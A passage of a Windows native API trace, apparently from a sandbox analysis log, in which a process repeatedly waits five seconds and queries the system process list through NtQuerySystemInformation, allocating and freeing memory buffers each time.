NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.990] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.000] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.021] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.031] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.042] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.059] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.066] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.081] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.088] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.096] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.102] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.109] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.118] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.126] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.133] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, 